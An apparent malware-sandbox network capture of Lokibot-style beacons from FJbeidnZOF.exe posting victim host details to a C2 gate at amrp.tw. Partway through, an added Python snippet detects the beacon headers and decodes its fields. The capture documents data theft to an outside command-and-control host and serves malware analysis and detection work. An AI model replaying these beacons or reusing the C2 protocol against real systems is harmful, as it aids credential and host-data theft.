    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:32.457886934 CEST | 1326 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:33.094299078 CEST | 1326 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:33 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.2.3 | 49767 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:33.595262051 CEST | 1327 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:33.841697931 CEST | 1331 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:34.339798927 CEST | 1337 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:34 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.2.3 | 49769 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:35.143655062 CEST | 1343 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:35.396190882 CEST | 1352 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:35.863095999 CEST | 3735 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:36 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
38 | 192.168.2.3 | 49774 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:36.416202068 CEST | 4730 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:36.661104918 CEST | 4733 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:37.123349905 CEST | 4737 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:37 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.2.3 | 49775 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:37.810117960 CEST | 4738 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:38.055672884 CEST | 4738 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:38.525527954 CEST | 4738 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:38 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49727 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:18:49.841094971 CEST | 1151 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:18:50.088618994 CEST | 1151 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:18:50.552958965 CEST | 1152 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:18:50 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
40 | 192.168.2.3 | 49776 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:39.063488007 CEST | 6031 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:39.319890976 CEST | 6047 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:39.786050081 CEST | 6047 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:40 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
41 | 192.168.2.3 | 49777 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:40.333359003 CEST | 6048 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:40.580059052 CEST | 6049 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:41.045489073 CEST | 6049 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:41 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.2.3 | 49778 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:41.793612957 CEST | 6050 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:42.042092085 CEST | 6050 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:42.508225918 CEST | 6050 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:42 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.2.3 | 49779 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:43.006592035 CEST | 6051 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:43.256814003 CEST | 6051 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:43.724215031 CEST | 6052 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:44 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.2.3 | 49780 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:44.271004915 CEST | 6052 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:44.519397974 CEST | 6053 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:44.985843897 CEST | 6053 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:45 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
45 | 192.168.2.3 | 49781 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:45.490786076 CEST | 6054 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:45.739958048 CEST | 6054 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:46.207195044 CEST | 6054 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:46 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.3 | 49782 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:46.703121901 CEST | 6055 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:46.949304104 CEST | 6055 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:47.425873041 CEST | 6056 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:47 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            47192.168.2.34978335.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:47.909071922 CEST6057OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:48.154562950 CEST6057OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:48.625330925 CEST6057INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.
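The request head and the raw body bytes shown in the session above are enough to build both a detection and a decoder for this beacon. The following is an added example, not code from the report or from Joe Sandbox: it flags the Lokibot indicators in the HTTP head (the fixed User-Agent string, the non-standard Content-Key header, and the binary octet-stream body) and walks the length-prefixed fields of the body. The byte layout (u16 version, u32 type, u32-length ASCII binary ID, then repeated u16 flag + u32 length + string) is read off the captured bytes; treating the 01 00 flag as "UTF-16LE string" and naming the fields username, computer name and domain is an assumption taken from public Lokibot write-ups, since the report itself does not name them. Because the report truncates the raw dump to 82 of the 163 body bytes, the last field is cut off, and the decoder reports that rather than failing.

```python
import re
import struct

# Request head exactly as captured in the session above (CRLF line endings restored).
REQUEST_HEAD = (
    "POST /kayo/gate.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: amrp.tw\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: FC7C64DA\r\n"
    "Content-Length: 163\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Body bytes as shown in "Data Raw" above: only the first 82 of 163 bytes are in the report.
BODY_HEX = (
    "12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 "
    "64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 "
    "45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37"
)
BODY = bytes.fromhex(BODY_HEX)

LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"

# Assumed field order (from public Lokibot write-ups, not from the report).
FIELD_NAMES = ["username", "computer_name", "domain"]


def parse_request_head(head: str) -> tuple[str, dict]:
    """Split a raw HTTP request head into (request line, lower-cased header dict)."""
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:          # empty line ends the head
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def lokibot_indicators(head: str) -> list[str]:
    """Return the Lokibot C2 indicators present in a request head (empty list if none)."""
    _, headers = parse_request_head(head)
    hits = []
    if headers.get("user-agent") == LOKIBOT_UA:
        hits.append("user-agent")
    # Content-Key is not a standard HTTP header; here it carries an 8-hex-digit host key.
    if re.fullmatch(r"[0-9A-F]{8}", headers.get("content-key", "")):
        hits.append("content-key")
    if (headers.get("content-encoding") == "binary"
            and headers.get("content-type") == "application/octet-stream"):
        hits.append("binary-octet-stream")
    return hits


def parse_beacon(body: bytes) -> dict:
    """Decode the length-prefixed fields of a Lokibot beacon body.

    Layout observed in the capture: u16 version, u32 type, u32 length + ASCII binary ID,
    then repeated (u16 wide flag, u32 length, string bytes). A field whose declared length
    runs past the end of the buffer is returned as far as it goes and marked truncated."""
    version, ptype, id_len = struct.unpack_from("<HII", body, 0)
    pos = 10
    binary_id = body[pos:pos + id_len].decode("ascii")
    pos += id_len
    fields = []
    while pos + 6 <= len(body):
        wide, length = struct.unpack_from("<HI", body, pos)
        pos += 6
        raw = body[pos:pos + length]
        truncated = len(raw) < length
        if wide == 1:
            # UTF-16LE; drop a dangling odd byte left by a cut-off dump.
            value = raw[: len(raw) - len(raw) % 2].decode("utf-16-le")
        else:
            value = raw.decode("latin-1")
        idx = len(fields)
        fields.append({
            "name": FIELD_NAMES[idx] if idx < len(FIELD_NAMES) else f"field{idx}",
            "value": value,
            "declared_length": length,
            "truncated": truncated,
        })
        pos += length
    return {"version": version, "type": ptype, "binary_id": binary_id, "fields": fields}


if __name__ == "__main__":
    print("indicators:", lokibot_indicators(REQUEST_HEAD))
    beacon = parse_beacon(BODY)
    print("version=0x%02x type=0x%02x binary_id=%s" % (beacon["version"], beacon["type"], beacon["binary_id"]))
    for f in beacon["fields"]:
        print(" %-14s %-20r declared=%d truncated=%s" % (f["name"], f["value"], f["declared_length"], f["truncated"]))
```

Two points for anyone turning this into a rule: the host amrp.tw, the path /kayo/gate.php and the Content-Key value FC7C64DA are specific to this sample and this victim, while the User-Agent string, the Content-Key header itself and the binary octet-stream POST are the durable traits to key on. The gate answered 404 "File not found." to every beacon in this capture, so there is no command traffic here to decode.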


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            48 | 192.168.2.3 | 49784 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:19:49.118557930 CEST | 6058 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:49.365712881 CEST | 6058 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:49.835997105 CEST | 6059 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            49 | 192.168.2.3 | 49785 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:19:50.337779999 CEST | 6059 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:50.586885929 CEST | 6060 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:51.062310934 CEST | 6060 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            5 | 192.168.2.3 | 49730 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:18:51.066015959 CEST | 1152 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:51.314085007 CEST | 1153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:51.785861969 CEST | 1153 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            50 | 192.168.2.3 | 49786 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
